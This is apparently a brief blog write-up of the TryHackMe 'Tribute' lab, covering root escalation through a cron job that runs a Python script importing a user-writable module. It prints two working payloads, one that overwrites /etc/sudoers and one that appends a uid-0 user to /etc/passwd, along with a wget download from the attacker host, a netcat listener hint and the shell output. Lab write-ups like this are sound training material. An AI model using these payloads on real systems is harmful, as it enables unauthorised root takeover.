THM: Tribute et al

Updates

I’ve just done Knife on HTB; no writeup obviously - it’s only a day old. I also finished MusicalStego which I can barely remember even starting, and then I did Tribute, which I don’t remember joining.

I’m not going to write much, just a brief mention about Tribute.

The root part takes advantage of a python script running on a one minute cron job as root. Here’s the entry from pspy:

2021/05/24 04:14:01 CMD: UID=0 PID=26303

/bin/sh -c python3 /home/meaghyn/.noises/.noises.py

Now, the content is basically this:

import socket
import sounds
print(“creak”)

Pretty basic, no? Anyway, the maker seems to have intended for you to use this to launch a reverse shell. One of the questions says:

What needs to be running to make .noises.py run without errors?

A hint given is:

nc -nvklp 1337

And the answer it wants is:

listener

I’m sorry, but that’s ridiculous. The cron job (and hence the script) already runs very happily every 60 seconds without errors; no listener required. And quite frankly we don’t need a listener to get root either. Here are two alternative methods, using sounds.py. In version 1, we add our user to the sudoers group:

┌──(root💀kali)-[/opt/thm/tributeqf]
└─# cat sounds.py                                                                       
import os
os.system('echo "meaghyn ALL=(root) NOPASSWD: ALL" > /etc/sudoers')

And on the box:

wget http://10.9.10.123:9090/sounds.py
--2021-05-24 04:29:43--  http://10.9.10.123:9090/sounds.py
Connecting to 10.9.10.123:9090... connected.
HTTP request sent, awaiting response... d200 OK
Length: 78 [text/x-python]
Saving to: ‘sounds.py’

sounds.py           100%[===================>]      78  --.-KB/s    in 0s      

2021-05-24 04:29:43 (14.5 MB/s) - ‘sounds.py’ saved [78/78]
meaghyn@ubuntu:~/.noises$ date
date
Mon May 24 04:29:49 PDT 2021
meaghyn@ubuntu:~/.noises$ sudo -l
sudo -l
[sudo] password for meaghyn: meaghyn

Sorry, user meaghyn may not run sudo on ubuntu.
meaghyn@ubuntu:~/.noises$ date
date
Mon May 24 04:30:01 PDT 2021
meaghyn@ubuntu:~/.noises$ sudo -l
sudo -l
User meaghyn may run the following commands on ubuntu:
    (root) NOPASSWD: ALL
meaghyn@ubuntu:~/.noises$ sudo su
sudo su
root@ubuntu:/home/meaghyn/.noises# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Mon May 24 04:30:13 PDT 2021
root@ubuntu:/home/meaghyn/.noises#

Boom, roasted. In version 2 we use sounds.py to add root2 to /etc/passwd:

meaghyn@ubuntu:~/.noises$ cat sounds.py
cat sounds.py
import os
os.system('echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd')
meaghyn@ubuntu:~/.noises$ su root2 
su root2
Password: mrcake

root@ubuntu:/home/meaghyn/.noises# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Mon May 24 04:21:19 PDT 2021
root@ubuntu:/home/meaghyn/.noises# cd /root
cd /root
root@ubuntu:~#

So there we go; root two ways and no listener required. There’s almost certainly an SSH method available too; write your public key to authorized_keys for root or something. When you’ve got root code execution, the world is your oyster.